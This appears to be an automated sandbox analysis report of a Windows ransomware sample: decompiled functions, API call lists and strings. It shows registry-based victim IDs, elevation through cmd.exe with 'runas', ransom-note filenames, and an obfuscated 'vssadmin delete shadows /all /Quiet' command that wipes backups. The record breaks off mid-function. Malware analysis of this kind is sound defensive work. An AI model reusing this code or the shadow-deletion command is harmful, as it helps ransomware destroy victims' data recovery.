Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

Desktop, xrefs: 0041360A
help_recover_instructions, xrefs: 0041364F, 004136B7
%s\%s+%s.txt, xrefs: 0041365B
C:\Users\admin\Desktop, xrefs: 00413583
C:\Users\Public\Desktop, xrefs: 00413545
%s\%s+%s.html, xrefs: 004136C3
Public Desktop, xrefs: 0041361D, 00413636
C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn, xrefs: 004135C3

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00401230, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 178

C-Code - Quality: 65%

			E00401230(void* __ebx) {
				signed int _v8;
				char _v54;
				char _v56;
				void* _v60;
				int _v64;
				int _v68;
				void* __edi;
				void* __esi;
				signed int _t25;
				long _t29;
				intOrPtr _t43;
				intOrPtr* _t44;
				short _t92;
				intOrPtr _t93;
				signed int _t94;
				void* _t95;
				void* _t96;

				_t61 = __ebx;
				_t25 =  *0x43f054; // 0xd46ffb00
				_v8 = _t25 ^ _t94;
				_v60 = 0;
				_v64 = 8;
				_v56 = 0;
				E0042D0A0( &_v54, 0, 0x2e);
				_t93 = __imp__RegCreateKeyExW; // 0x7634407e
				_t96 = _t95 + 0xc;
				_t29 = RegCreateKeyExW(0x80000003, L"\\S-1-5-18\\Software\\xxxsys\\", 0, 0, 0, 0x20019, 0,  &_v60, 0);
				_t92 = "-F4voH4v~@4v"; // 0x7634462d
				if(_t29 != 0 || RegQueryValueExW(_v60, L"ID", 0,  &_v68, 0x441d20,  &_v64) != 0) {
					RegCreateKeyExW(0x80000001, L"Software\\xxxsys\\", 0, 0, 0, 0x2001f, 0,  &_v60, 0);
					if(RegQueryValueExW(_v60, L"ID", 0,  &_v68, 0x441d20,  &_v64) != 0) {
						_t43 =  *0x462890; // 0x0
						if(_t43 == 0) {
							_t43 = 0x440288;
							 *0x462890 = 0x440288;
						}
						_t18 = _t43 + 4; // 0x41c850
						_t44 =  *_t18;
						if(_t44 != 0) {
							 *_t44(0x441d20, 8);
							_t96 = _t96 + 8;
						}
						RegSetValueExW(_v60, L"ID", 0, 3, 0x441d20, 8);
						RegFlushKey(_v60);
					}
					_push( *0x441d23 & 0x000000ff);
					_push( *0x441d22 & 0x000000ff);
					_push( *0x441d21 & 0x000000ff);
					E00401D10(0x18, 0x441d28, L"%X%X%X%X",  *0x441d20 & 0x000000ff);
					_push( *0x441d27 & 0x000000ff);
					_push( *0x441d26 & 0x000000ff);
					E00401D10(0x18,  &_v56, L"%X%X%X%X",  *0x441d24 & 0x000000ff);
					E00425ACD(0x441d28, 0x18,  &_v56);
					RegCloseKey(_v60);
					return E004256FE(0, _t61, _v8 ^ _t94,  &_v56, _t92, _t93,  *0x441d25 & 0x000000ff);
				} else {
					_push( *0x441d23 & 0x000000ff);
					_push( *0x441d22 & 0x000000ff);
					_push( *0x441d21 & 0x000000ff);
					E00401D10(0x18, 0x441d28, L"%X%X%X%X",  *0x441d20 & 0x000000ff);
					_push( *0x441d27 & 0x000000ff);
					_push( *0x441d26 & 0x000000ff);
					E00401D10(0x18,  &_v56, L"%X%X%X%X",  *0x441d24 & 0x000000ff);
					E00425ACD(0x441d28, 0x18,  &_v56);
					RegCloseKey(_v60);
					return E004256FE(1, __ebx, _v8 ^ _t94, 0x18, _t92, _t93,  *0x441d25 & 0x000000ff);
				}
			}

0x00401230
0x00401238
0x0040123f
0x0040124d
0x00401254
0x0040125b
0x0040125f
0x00401264
0x0040126a
0x0040128a
0x0040128c
0x00401294
0x00401372
0x00401390
0x00401392
0x00401399
0x0040139b
0x004013a0
0x004013a0
0x004013a5
0x004013a5
0x004013aa
0x004013b3
0x004013b5
0x004013b5
0x004013cc
0x004013d6
0x004013d6
0x004013f1
0x004013f9
0x004013fa
0x0040140b
0x00401425
0x0040142d
0x0040143e
0x0040144e
0x0040145a
0x00401471
0x004012bc
0x004012d1
0x004012d9
0x004012da
0x004012eb
0x00401305
0x0040130d
0x0040131e
0x0040132e
0x0040133a
0x00401354
0x00401354

APIs

RegCreateKeyExW.ADVAPI32(80000003,\S-1-5-18\Software\xxxsys\,00000000,00000000,00000000,00020019,00000000,00000000,00000000), ref: 0040128A
RegQueryValueExW.ADVAPI32(00000000,004343E0,00000000,?,00441D20,00000008), ref: 004012B2
RegCloseKey.ADVAPI32(00000000), ref: 0040133A
RegCreateKeyExW.ADVAPI32(80000001,Software\xxxsys\,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00401372
RegQueryValueExW.ADVAPI32(00000000,004343E0,00000000,?,00441D20,00000008), ref: 0040138C
RegSetValueExW.ADVAPI32(00000000,004343E0,00000000,00000003,00441D20,00000008), ref: 004013CC
RegFlushKey.ADVAPI32(00000000), ref: 004013D6
RegCloseKey.ADVAPI32(00000000), ref: 0040145A

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

Software\xxxsys\, xrefs: 00401368
\S-1-5-18\Software\xxxsys\, xrefs: 00401280
%X%X%X%X, xrefs: 004012DC, 00401313, 004013FC, 00401433
-F4voH4v~@4v, xrefs: 0040128C

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00420350, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 138

C-Code - Quality: 90%

			E00420350(WCHAR* _a4) {
				signed int _v12;
				intOrPtr _v18;
				intOrPtr _v22;
				intOrPtr _v26;
				void _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void _v60;
				void _v64;
				void _v68;
				long _v72;
				struct HBITMAP__* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				WCHAR* _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				int _t56;
				signed int _t59;
				int _t64;
				void* _t77;
				signed int _t81;
				long _t90;
				void* _t92;
				struct HDC__* _t93;
				signed int _t94;
				signed int _t100;

				_t51 =  *0x43f054; // 0xd46ffb00
				_v12 = _t51 ^ _t94;
				_v96 = _a4;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_t92 = 0;
				_v92 = 0;
				_t56 = E00420280( &_v92);
				_v76 = _t56;
				if(_t56 != 0) {
					_t59 = _v84 + _v84 * 2;
					_t81 = _t59 & 0x00000003;
					if(_t81 > 0) {
						_t86 = 4 - _t81;
						_t59 = _t59 + 4;
						_t100 = _t59;
					}
					_t90 = _v80 * _t59;
					_push(_t90);
					_t77 = E004256E8(_t90, _t92, _t100);
					if(_t77 != _t92) {
						_v68 = _t92;
						_v64 = 0;
						_v60 = 0;
						_v56 = 0;
						_v52 = 0;
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v26 = 0;
						_v22 = 0;
						_v18 = 0;
						_t93 = GetDC(_t92);
						_t64 = _v80;
						_v60 = _t64;
						_v68 = 0x28;
						_v56 = 0x180001;
						_v64 = _v84;
						GetDIBits(_t93, _v76, 0, _t64, _t77,  &_v68, 0);
						ReleaseDC(0, _t93);
						_t86 = 0x4d42;
						_v18 = 0x36;
						_v26 = _t90 + 0x36;
						_v28 = 0x4d42;
						_v72 = 0;
						_t92 = CreateFileW(_v96, 0xc0000000, 0, 0, 2, 0x80, 0);
						if(_t92 != 0xffffffff) {
							WriteFile(_t92,  &_v28, 0xe,  &_v72, 0);
							_v72 = 0;
							WriteFile(_t92,  &_v68, 0x28,  &_v72, 0);
							_t86 =  &_v72;
							_v72 = 0;
							WriteFile(_t92, _t77, _t90,  &_v72, 0);
						}
						FlushFileBuffers(_t92);
						CloseHandle(_t92);
						_push(_t77);
						E004264AD();
					}
					_t56 = DeleteObject(_v76);
				}
				return E004256FE(_t56, _t77, _v12 ^ _t94, _t86, _t90, _t92);
			}

0x00420358
0x0042035f
0x00420365
0x0042036c
0x0042036f
0x00420372
0x00420375
0x0042037b
0x0042037e
0x00420383
0x00420388
0x00420391
0x00420396
0x00420399
0x004203a0
0x004203a2
0x004203a2
0x004203a2
0x004203a7
0x004203aa
0x004203b0
0x004203b7
0x004203c0
0x004203c3
0x004203c6
0x004203c9
0x004203cc
0x004203cf
0x004203d2
0x004203d5
0x004203d8
0x004203db
0x004203de
0x004203e2
0x004203e5
0x004203e8
0x004203fa
0x004203fc
0x00420401
0x0042040b
0x00420412
0x00420419
0x0042041c
0x00420425
0x00420443
0x00420449
0x00420450
0x00420453
0x00420457
0x00420464
0x00420469
0x00420478
0x0042048b
0x00420492
0x0042049a
0x004204a1
0x004204a8
0x004204a8
0x004204af
0x004204b6
0x004204bc
0x004204bd
0x004204c2
0x004204c9
0x004204c9
0x004204df

APIs

Part of subcall function 00420280: GetDC.USER32(00000000), ref: 0042028F
Part of subcall function 00420280: CreateCompatibleBitmap.GDI32(00000000,0000047E,000003E8), ref: 004202C2
Part of subcall function 00420280: CreateCompatibleDC.GDI32(00000000), ref: 004202CF
Part of subcall function 00420280: SelectObject.GDI32(00000000,00000000), ref: 004202DD
Part of subcall function 00420280: SetBkMode.GDI32(00000000,00000001), ref: 004202E9
Part of subcall function 00420280: SetTextColor.GDI32(00000000,00FFFFFF), ref: 004202F5
Part of subcall function 00420280: SelectObject.GDI32(00000000,00000000), ref: 00420308
Part of subcall function 00420280: DeleteDC.GDI32(00000000), ref: 0042030F
Part of subcall function 00420280: ReleaseDC.USER32(00000000,00000000), ref: 00420322
Part of subcall function 00420280: DeleteObject.GDI32(00000000), ref: 00420333

GetDC.USER32(00000000), ref: 004203EB
GetDIBits.GDI32(00000000,?,00000000,?,00000000,?,00000000), ref: 0042041C
ReleaseDC.USER32(00000000,00000000), ref: 00420425
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0042045E
WriteFile.KERNEL32(00000000,?,0000000E,00000000,00000000), ref: 00420478
WriteFile.KERNEL32(00000000,00000028,00000028,00000000,00000000), ref: 00420492
WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004204A8
FlushFileBuffers.KERNEL32(00000000), ref: 004204AF
CloseHandle.KERNEL32(00000000), ref: 004204B6
DeleteObject.GDI32(?), ref: 004204C9

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

(, xrefs: 0042040B
6, xrefs: 00420449

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041EA20, Relevance: 21.1, APIs: 3, Strings: 11, Instructions: 118

C-Code - Quality: 73%

			E0041EA20(void* __ebx) {
				signed int _v8;
				char _v263;
				char _v264;
				char _v524;
				char _v528;
				void* _v532;
				intOrPtr _v560;
				char* _v568;
				char* _v572;
				char* _v576;
				intOrPtr _v584;
				char _v588;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr* _t33;
				void* _t47;
				intOrPtr* _t50;
				void* _t55;
				void* _t57;
				void* _t70;
				void* _t72;
				signed int _t77;
				void* _t79;
				void* _t81;
				void* _t82;

				_t57 = __ebx;
				_t75 = _t77;
				_t29 =  *0x43f054; // 0xd46ffb00
				_v8 = _t29 ^ _t77;
				_v264 = 0;
				E0042D0A0( &_v263, 0, 0xff);
				_t33 =  *0x48223c; // 0x0
				_t79 = _t77 - 0x248 + 0xc;
				_v528 = 0;
				if(_t33 != 0) {
					 *_t33( &_v528);
				}
				E00425D48( &_v264, 0x100, "vssa");
				E00425D48( &_v264, 0x100, "dmin");
				E00425D48( &_v264, 0x100, ".exe");
				E0042D0A0( &_v524, 0, 0x104);
				E00425D48( &_v524, 0x104, " delete ");
				E00425D48( &_v524, 0x104, " shadows ");
				E00425D48( &_v524, 0x104, " /all  ");
				E00425D48( &_v524, 0x104, " /Quiet  ");
				E0042D0A0( &_v588, 0, 0x3c);
				_t81 = _t79 + 0x6c;
				_v588 = 0x3c;
				_v576 = "open";
				if( *0x482238 == 0) {
					_v576 = "runas";
				}
				_t69 =  &_v264;
				_v572 =  &_v264;
				_v568 =  &_v524;
				_v560 = 0;
				_v584 = 0x40;
				_t47 = E004204E0( &_v588);
				_t82 = _t81 + 4;
				if(_t47 == 0) {
					_push(_t72);
					_push(_t70);
					while(GetLastError() == 0x4c7) {
						Sleep(0x834);
						_t69 =  &_v588;
						_t55 = E004204E0( &_v588);
						_t82 = _t82 + 4;
						if(_t55 == 0) {
							continue;
						}
						break;
					}
					_pop(_t70);
					_pop(_t72);
				}
				CloseHandle(_v532);
				_t50 =  *0x482240; // 0x0
				if(_t50 != 0) {
					 *_t50(_v528);
				}
				return E004256FE(0, _t57, _v8 ^ _t75, _t69, _t70, _t72);
			}

0x0041ea20
0x0041ea23
0x0041ea2b
0x0041ea32
0x0041ea43
0x0041ea4a
0x0041ea4f
0x0041ea54
0x0041ea57
0x0041ea63
0x0041ea6c
0x0041ea6c
0x0041ea7f
0x0041ea95
0x0041eaab
0x0041eabe
0x0041ead4
0x0041eaea
0x0041eb03
0x0041eb19
0x0041eb29
0x0041eb2e
0x0041eb38
0x0041eb42
0x0041eb4c
0x0041eb4e
0x0041eb4e
0x0041eb5e
0x0041eb6b
0x0041eb71
0x0041eb77
0x0041eb81
0x0041eb8b
0x0041eb90
0x0041eb95
0x0041eb97
0x0041eb9e
0x0041eba5
0x0041ebb3
0x0041ebb5
0x0041ebbc
0x0041ebc1
0x0041ebc6
0x00000000
0x00000000
0x00000000
0x0041ebc6
0x0041ebc8
0x0041ebc9
0x0041ebc9
0x0041ebd1
0x0041ebd7
0x0041ebde
0x0041ebe7
0x0041ebe7
0x0041ebf8

APIs

GetLastError.KERNEL32 ref: 0041EBA5
Sleep.KERNEL32(00000834), ref: 0041EBB3
CloseHandle.KERNEL32(?), ref: 0041EBD1

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

shadows , xrefs: 0041EAD9
/all , xrefs: 0041EAF2
/Quiet , xrefs: 0041EB08
runas, xrefs: 0041EB4E
open, xrefs: 0041EB42
delete , xrefs: 0041EAC3
<, xrefs: 0041EB38
dmin, xrefs: 0041EA84
@, xrefs: 0041EB81
vssa, xrefs: 0041EA6E
.exe, xrefs: 0041EA9A

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041E880, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 106

C-Code - Quality: 75%

			E0041E880() {
				signed int _v8;
				char _v528;
				short _v1048;
				char _v2088;
				struct _SHELLEXECUTEINFOW _v2148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				long _t31;
				void* _t46;
				void* _t59;
				void* _t61;
				signed int _t66;

				_t64 = _t66;
				_t24 =  *0x43f054; // 0xd46ffb00
				_v8 = _t24 ^ _t66;
				E0042D0A0( &_v2088, 0, 0x410);
				E0042D0A0( &_v1048, 0, 0x208);
				_t56 =  &_v528;
				E0042D0A0( &_v528, 0, 0x208);
				_t31 = GetEnvironmentVariableW(L"windir",  &_v1048, 0x208);
				if(_t31 != 0 && _t31 <= 0x208) {
					_t56 =  &_v2088;
					if(E0041E810(0x410,  &_v2088, L"%s\\system32\\cmd.exe",  &_v1048) == 0) {
						_push(_t61);
						E0042623B( &_v528, 0x104, L"/c start \"\" \"");
						E00425ACD( &_v528, 0x104, 0x46c238);
						E00425ACD( &_v528, 0x104, "\"");
						E0042D0A0( &_v2148, 0, 0x3c);
						_v2148.cbSize = 0x3c;
						_v2148.lpVerb = L"runas";
						_v2148.lpFile =  &_v2088;
						_v2148.lpParameters =  &_v528;
						_v2148.nShow = 0;
						_v2148.fMask = 0x40;
						if(ShellExecuteExW( &_v2148) == 0) {
							_push(_t46);
							_push(_t59);
							while(GetLastError() == 0x4c7) {
								Sleep(0x3e8);
								if(ShellExecuteExW( &_v2148) == 0) {
									continue;
								}
								break;
							}
							_pop(_t59);
							_pop(_t46);
						}
						_t56 = _v2148.hProcess;
						CloseHandle(_v2148.hProcess);
						_pop(_t61);
					}
				}
				return E004256FE(1, _t46, _v8 ^ _t64, _t56, _t59, _t61);
			}

APIs

GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041E8E2
ShellExecuteExW.SHELL32(?), ref: 0041E9C6
GetLastError.KERNEL32 ref: 0041E9E0
Sleep.KERNEL32(000003E8), ref: 0041E9EE
ShellExecuteExW.SHELL32(0000003C), ref: 0041E9F7
CloseHandle.KERNEL32(?), ref: 0041EA06

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Part of subcall function 0041E810: _vsnwprintf.NTDLL ref: 0041E841

Strings

/c start "" ", xrefs: 0041E924
%s\system32\cmd.exe, xrefs: 0041E908
<, xrefs: 0041E992
windir, xrefs: 0041E8DD
@, xrefs: 0041E9BC
runas, xrefs: 0041E99C

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042C826, Relevance: 18.5, APIs: 12, Instructions: 494

C-Code - Quality: 90%

			E0042C826(void* __ebx, signed int __edx, long _a4, long _a8, signed int _a12) {
				signed int _v8;
				char _v15;
				void _v16;
				short _v1724;
				char _v5140;
				void _v6844;
				short _v6848;
				long _v6852;
				signed int _v6853;
				long _v6860;
				long _v6864;
				int _v6868;
				long _v6872;
				long _v6876;
				long _v6880;
				long _v6884;
				signed int _v6888;
				void* __edi;
				void* __esi;
				signed int _t209;
				long _t211;
				intOrPtr _t214;
				long _t215;
				intOrPtr _t216;
				long _t217;
				signed int _t225;
				signed int* _t230;
				long _t242;
				long _t245;
				signed int* _t246;
				long _t252;
				long _t253;
				signed int* _t256;
				long _t262;
				long _t263;
				void* _t267;
				long _t271;
				int _t272;
				long _t274;
				void* _t275;
				short _t277;
				void* _t278;
				void* _t282;
				long _t284;
				void* _t286;
				int _t293;
				int _t300;
				void* _t304;
				intOrPtr* _t313;
				long _t314;
				signed int _t315;
				signed short* _t316;
				signed int _t317;
				long _t318;
				signed short* _t319;
				long _t331;
				long _t335;
				long _t337;
				char _t341;
				signed int _t352;
				long _t355;
				void* _t356;
				void* _t357;
				long _t359;
				signed int _t361;
				void* _t362;

				_t350 = __edx;
				_t312 = __ebx;
				E0042E220(0x1ae4);
				_t209 =  *0x43f054; // 0xd46ffb00
				_v8 = _t209 ^ _t361;
				_t211 = _a8;
				_t355 = _a4;
				_t352 = 0;
				_v6864 = _t211;
				_v6860 = 0;
				_v6868 = 0;
				if(_a12 != 0) {
					__eflags = _t211;
					if(__eflags != 0) {
						_push(__ebx);
						_t313 = 0x482280 + (_t355 >> 5) * 4;
						_t214 =  *_t313;
						_t352 = (_t355 & 0x0000001f) << 6;
						_t322 =  *((intOrPtr*)(_t214 + _t352 + 0x24)) +  *((intOrPtr*)(_t214 + _t352 + 0x24)) >> 1;
						_v6880 = _t313;
						_v6853 = _t322;
						__eflags = _t322 - 2;
						if(_t322 == 2) {
							L6:
							_t322 =  !_a12;
							__eflags =  !_a12 & 0x00000001;
							if(__eflags != 0) {
								L8:
								__eflags =  *(_t214 + _t352 + 4) & 0x00000020;
								if(( *(_t214 + _t352 + 4) & 0x00000020) != 0) {
									E0042C6B7(_t322, _t355, 0, 0, 2);
									_t362 = _t362 + 0x10;
								}
								_t215 = E0042D042(_t355);
								__eflags = _t215;
								if(_t215 == 0) {
									L45:
									_t325 = 0;
									__eflags = 0;
									goto L46;
								} else {
									__eflags =  *(_t352 +  *_t313 + 4) & 0x00000080;
									if(__eflags == 0) {
										goto L45;
									}
									_t267 = E0042AA05(_t313, __eflags);
									__eflags =  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14);
									_t355 = 0 |  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14) == 0x00000000;
									_t271 = GetConsoleMode( *(_t352 +  *_t313),  &_v6884);
									_t325 = 0;
									__eflags = _t271;
									if(_t271 == 0) {
										L46:
										_t216 =  *_t313;
										__eflags =  *(_t216 + _t352 + 4) & 0x00000080;
										if(( *(_t216 + _t352 + 4) & 0x00000080) == 0) {
											_t217 = WriteFile( *(_t216 + _t352), _v6864, _a12,  &_v6876, _t325);
											__eflags = _t217;
											if(_t217 == 0) {
												L85:
												_v6848 = GetLastError();
												L86:
												__eflags = _v6860;
												if(_v6860 != 0) {
													_t220 = _v6860 - _v6868;
													__eflags = _v6860 - _v6868;
													L97:
													_pop(_t312);
													L98:
													return E004256FE(_t220, _t312, _v8 ^ _t361, _t350, _t352, _t355);
												}
												L87:
												__eflags = _v6848;
												if(_v6848 == 0) {
													L91:
													__eflags =  *(_t352 +  *_v6880 + 4) & 0x00000040;
													if(__eflags == 0) {
														L94:
														 *((intOrPtr*)(E00427125(__eflags))) = 0x1c;
														_t225 = E00427138(__eflags);
														 *_t225 =  *_t225 & 0x00000000;
														__eflags =  *_t225;
														L95:
														_t220 = _t225 | 0xffffffff;
														goto L97;
													}
													__eflags =  *_v6864 - 0x1a;
													if(__eflags != 0) {
														goto L94;
													}
													_t220 = 0;
													goto L97;
												}
												_t355 = 5;
												__eflags = _v6848 - _t355;
												if(__eflags != 0) {
													_t225 = E0042714B(_v6848);
												} else {
													 *((intOrPtr*)(E00427125(__eflags))) = 9;
													_t225 = E00427138(__eflags);
													 *_t225 = _t355;
												}
												goto L95;
											}
											_v6848 = _v6848 & 0x00000000;
											_v6860 = _v6876;
											goto L86;
										}
										__eflags = _v6853;
										_v6848 = _t325;
										if(_v6853 != 0) {
											__eflags = _v6853 - 2;
											if(_v6853 != 2) {
												_v6872 = _v6864;
												__eflags = _a12 - _t325;
												if(_a12 <= _t325) {
													goto L91;
												} else {
													goto L70;
												}
												do {
													L70:
													_v6852 = _v6852 & 0x00000000;
													_t331 = _v6872 - _v6864;
													__eflags = _t331;
													_t230 =  &_v1724;
													_t356 = 2;
													do {
														__eflags = _t331 - _a12;
														if(_t331 >= _a12) {
															break;
														}
														_t350 =  *_v6872 & 0x0000ffff;
														_v6872 = _v6872 + _t356;
														_t331 = _t331 + _t356;
														__eflags = _t350 - 0xa;
														if(_t350 == 0xa) {
															_t315 = 0xd;
															 *_t230 = _t315;
															_t230 = _t230 + _t356;
															_t167 =  &_v6852;
															 *_t167 = _v6852 + _t356;
															__eflags =  *_t167;
														}
														_v6852 = _v6852 + _t356;
														 *_t230 = _t350;
														_t230 = _t230 + _t356;
														__eflags = _v6852 - 0x6a8;
													} while (_v6852 < 0x6a8);
													_t355 = 0;
													asm("cdq");
													_t314 = WideCharToMultiByte(0xfde9, 0,  &_v1724, _t230 -  &_v1724 - _t350 >> 1,  &_v5140, 0xd55, 0, 0);
													__eflags = _t314;
													if(_t314 == 0) {
														goto L85;
													} else {
														goto L76;
													}
													while(1) {
														L76:
														_t242 = WriteFile( *(_t352 +  *_v6880), _t361 + _t355 - 0x1410, _t314 - _t355,  &_v6876, 0);
														__eflags = _t242;
														if(_t242 == 0) {
															break;
														}
														_t355 = _t355 + _v6876;
														__eflags = _t314 - _t355;
														if(_t314 > _t355) {
															continue;
														}
														L80:
														__eflags = _t314 - _t355;
														if(_t314 > _t355) {
															goto L86;
														}
														goto L81;
													}
													_v6848 = GetLastError();
													goto L80;
													L81:
													_t245 = _v6872 - _v6864;
													_v6860 = _t245;
													__eflags = _t245 - _a12;
												} while (_t245 < _a12);
												goto L86;
											}
											_t316 = _v6864;
											__eflags = _a12 - _t325;
											if(_a12 <= _t325) {
												goto L91;
											} else {
												goto L60;
											}
											do {
												L60:
												_v6852 = _v6852 & 0x00000000;
												_t335 = _t316 - _v6864;
												__eflags = _t335;
												_t246 =  &_v6844;
												_t357 = 2;
												do {
													__eflags = _t335 - _a12;
													if(_t335 >= _a12) {
														break;
													}
													_t350 =  *_t316 & 0x0000ffff;
													_t316 = _t316 + _t357;
													_t335 = _t335 + _t357;
													_v6884 = _t316;
													__eflags = _t350 - 0xa;
													if(_t350 == 0xa) {
														_v6868 = _v6868 + _t357;
														_t317 = 0xd;
														 *_t246 = _t317;
														_t316 = _v6884;
														_t246 = _t246 + _t357;
														_t140 =  &_v6852;
														 *_t140 = _v6852 + _t357;
														__eflags =  *_t140;
													}
													_v6852 = _v6852 + _t357;
													 *_t246 = _t350;
													_t246 = _t246 + _t357;
													__eflags = _v6852 - 0x13fe;
												} while (_v6852 < 0x13fe);
												_t355 = _t246 -  &_v6844;
												_t252 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
												__eflags = _t252;
												if(_t252 == 0) {
													goto L85;
												}
												_t253 = _v6876;
												_v6860 = _v6860 + _t253;
												__eflags = _t253 - _t355;
												if(_t253 < _t355) {
													goto L86;
												}
												__eflags = _t316 - _v6864 - _a12;
											} while (_t316 - _v6864 < _a12);
											goto L86;
										}
										_t318 = _v6864;
										__eflags = _a12 - _t325;
										if(_a12 <= _t325) {
											goto L91;
										} else {
											goto L49;
										}
										do {
											L49:
											_t359 = 0;
											_t337 = _t318 - _v6864;
											__eflags = _t337;
											_t256 =  &_v6844;
											do {
												__eflags = _t337 - _a12;
												if(_t337 >= _a12) {
													break;
												}
												_t350 =  *_t318;
												_t318 = _t318 + 1;
												_t337 = _t337 + 1;
												_v6884 = _t318;
												__eflags = _t350 - 0xa;
												if(_t350 == 0xa) {
													_v6868 =  &(_v6868->Internal);
													 *_t256 = 0xd;
													_t256 =  &(_t256[0]);
													_t359 = _t359 + 1;
													__eflags = _t359;
												}
												 *_t256 = _t350;
												_t256 =  &(_t256[0]);
												_t359 = _t359 + 1;
												__eflags = _t359 - 0x13ff;
											} while (_t359 < 0x13ff);
											_t355 = _t256 -  &_v6844;
											_t262 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
											__eflags = _t262;
											if(_t262 == 0) {
												goto L85;
											}
											_t263 = _v6876;
											_v6860 = _v6860 + _t263;
											__eflags = _t263 - _t355;
											if(_t263 < _t355) {
												goto L86;
											}
											__eflags = _t318 - _v6864 - _a12;
										} while (_t318 - _v6864 < _a12);
										goto L86;
									}
									__eflags = _t355;
									if(_t355 == 0) {
										L15:
										_t272 = GetConsoleCP();
										_t319 = _v6864;
										_v6884 = _t272;
										_v6872 = 0;
										__eflags = _a12;
										if(_a12 <= 0) {
											goto L87;
										}
										_v6852 = 0;
										do {
											_t274 = _v6853;
											__eflags = _t274;
											if(_t274 != 0) {
												__eflags = _t274 - 1;
												if(_t274 == 1) {
													L35:
													_t355 =  *_t319 & 0x0000ffff;
													__eflags = _t355 - 0xa;
													_t325 = 0 | _t355 == 0x0000000a;
													_t319 =  &(_t319[1]);
													_t81 =  &_v6852;
													 *_t81 = _v6852 + 2;
													__eflags =  *_t81;
													_v6848 = _t355;
													_v6888 = _t355 == 0xa;
													L36:
													__eflags = _t274 - 1;
													if(_t274 == 1) {
														L38:
														_t275 = E0042F6BE(_t325, _v6848);
														_pop(_t325);
														__eflags = _t275 - _v6848;
														if(_t275 != _v6848) {
															goto L85;
														}
														_v6860 = _v6860 + 2;
														__eflags = _v6888;
														if(_v6888 == 0) {
															goto L42;
														}
														_t277 = 0xd;
														_v6848 = _t277;
														_t278 = E0042F6BE(_t325, _t277);
														_pop(_t325);
														__eflags = _t278 - _v6848;
														if(_t278 != _v6848) {
															goto L85;
														}
														_v6860 = _v6860 + 1;
